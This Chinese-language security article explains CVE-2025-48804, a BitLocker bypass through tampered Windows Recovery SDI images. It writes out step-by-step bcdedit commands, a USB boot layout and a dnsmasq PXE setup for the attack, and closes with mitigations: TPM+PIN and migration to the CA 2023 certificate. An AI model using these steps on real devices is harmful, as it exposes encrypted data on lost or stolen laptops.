一台全量打补丁的 Windows 11 笔记本，BitLocker 开着，TPM 芯片在工作，你觉得丢了顶多是硬件损失。不到五分钟，里面所有数据就摆在攻击者面前了。

这就是 CVE-2025-48804 的现实危害。安全研究员 garatc 把整套攻击工具 BitUnlocker 放上了 GitHub，PoC 全流程开源，通过一个 U 盘加几段脚本，就可以进行操作。

[出自:jiwo.org]

漏洞在哪

问题主要出现在 Windows 恢复环境的 SDI 文件加载机制上。通过验证发现它启动管理器只验证了第一个 WIM 镜像的完整性，第二个则是直接加载不问。这时候如果采用把篡改过的 WinRE 镜像塞进 SDI 的 blob 表，系统挂载 BitLocker 卷之后，拉起来的是一个直接弹 cmd.exe 的修改版镜像。这就导致了TPM 自己把密钥交出来了，整个操作过程没有暴力破解，没有密钥泄露。

在这个过程也说明它的Secure Boot 验证的是签名证书而不是版本号。那些有漏洞的旧版 bootmgfw.efi，签名依然是合法有效的，这就会导致其PCA 2011 证书依然会被信任，依然是有效通过，使其TPM 测量 PCR 7 加 PCR 11 一切正常，然后VMK 静默释放。补丁打了，攻击面还在，这个新旧版本的时间差是整套攻击能成立的关键。

完整 PoC 流程

攻击者先进入目标机的 WinRE 命令提示符，插入 USB 盘，导出并修改 BCD 文件，把恢复启动项的 SDI 路径重定向到恶意镜像。

E:  bcdedit /export BCD_modded  bcdedit /store BCD_modded /set {default} path \WINDOWS\system32\winload_DOESNOTEXIST.efi bcdedit /store BCD_modded /enum all rem 找到描述为 "Windows Recovery" 的条目，记录其 GUID  bcdedit /store BCD_modded /set {GUID} ramdisksdidevice boot bcdedit /store BCD_modded /set {GUID} ramdisksdipath \sdi\boot_patched.sdi  move BCD_modded BCD

把修改后的 BCD 放入 EFI\Microsoft\Boot\，把 boot_patched.sdi 放入 sdi\，U 盘格式化为 FAT32，结构如下。

USB根目录/  ├── EFI/Boot/bootx64.efi         # PCA 2011签名的旧版启动管理器  └── EFI/Microsoft/Boot/BCD        # 修改后的BCD  └── sdi/boot_patched.sdi         # 注入恶意WinRE的SDI镜像

没有网络环境的场合用 USB 启动，有网线的场合可以走 PXE，用 dnsmasq 搭一台 TFTP 服务器，效果一样。

sudo ifconfig $INTERFACE 10.13.37.1 sudo dnsmasq --no-daemon \   
 --interface="$INTERFACE" \   
 --dhcp-range=10.13.37.100,10.13.37.101,255.255.255.0,1h \   
 --dhcp-boot=bootmgfw.efi \   
 --enable-tftp \   
 --tftp-root="$ABS_TFTP_ROOT" \   
 --port=0

SDI 文件约 300 MB，PXE 传输需要数分钟。传输完成之后，cmd 弹出，OS 卷已挂载，如果盘符没有自动分配，用 diskpart 手动 assign 一个就行。

谁不受影响

不受影响的机器是配了 TPM 加 PIN 等，它是因为当预启动阶段没有 PIN时，就没有 VMK，直接让整套攻击在这个步骤中卡死。

还有就是已经完成 KB5025885 迁移、换用 Windows UEFI CA 2023 签名的设备同样不受影响。

说起来，2026 年初之后全新安装的 Windows 11 默认就带 CA 2023 签名的 bootmgfw.efi，可以用 sigcheck -i S:\EFI\Microsoft\Boot\bootmgfw.efi 确认自己是哪个证书链。

参考来源 https://github.com/garatc/BitUnlocker